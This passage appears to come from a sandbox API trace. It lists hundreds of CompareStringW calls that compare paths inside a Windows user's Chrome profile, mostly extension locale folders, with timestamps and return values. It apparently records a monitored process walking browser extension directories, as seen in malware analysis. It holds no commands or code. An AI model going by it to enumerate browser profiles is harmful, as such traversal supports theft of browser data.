Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount2=131) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount1=97, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount2=84) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", cchCount2=131) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", cchCount2=131) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", cchCount2=131) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", cchCount2=131) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", cchCount2=131) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", cchCount2=130) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", cchCount1=84, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", cchCount2=130) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 2 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\tr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\", cchCount2=134) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\", cchCount2=134) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\", cchCount2=134) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\", cchCount2=134) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\", cchCount2=134) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ca\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\", cchCount2=130) returned 3 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\", cchCount2=130) returned 1 [0286.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 